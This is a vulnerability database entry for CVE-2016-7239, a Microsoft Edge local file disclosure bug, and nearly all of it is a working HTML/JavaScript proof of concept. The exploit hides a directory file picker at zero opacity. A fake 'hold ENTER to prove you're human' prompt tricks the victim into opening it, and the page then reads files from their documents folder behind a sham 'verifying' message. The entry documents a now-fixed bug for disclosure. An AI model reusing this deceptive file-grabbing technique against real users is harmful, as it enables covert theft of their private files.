Microsoft Edge local files disclosure(CVE-2016-7239)

2017-04-15T00:00:00
ID SSV:92956
Type seebug
Reporter Root
Modified 2017-04-15T00:00:00

Description

No description provided by source.

                                        
                                            
                                                 the difference was that the default directory was 'My Documents' so I showed that the folderpicker can be used to recieve all the files within a victims documents folder.
This has since been fixed.
<html>
<head>
    <title>
		Read all files on PC - PoC - By @qab
    </title>
    <style>
        #thing {
            opacity: 0.0;
        }
    </style>
</head>

<body>
    <h3 id="qmsg">Hold down the ENTER key for 5 seconds to prove you're human..</h3>
    <input id="thing" type="file" webkitdirectory mozdirectory accept="text/*" />

    <script>
	
		  var r = new FileReader();
        thing.onchange = function() {
            alert('I can read ' + this.files.length + ' files from anywhere on your pc!');//This is for PoC only. We can access all data using this.files as seen next.
			r.onload=function(){
				alert(r.result);
			};
			
			r.readAsText(thing.files[0]);
        };
		
        //This is where we detect if the user is holding the Enter button.
        var i = 0;
        document.onkeydown = function() {
            i++;
            if (i > 4) {
                thing.click();
                i = -10000;
                document.onkeydown = null;
                setTimeout(function() {
                    qmsg.innerHTML = '<u>Thank you! Please wait while we verify (this might take a few minutes).</u>';
                }, 1000);
            };
        };
    </script>
</body>

</html>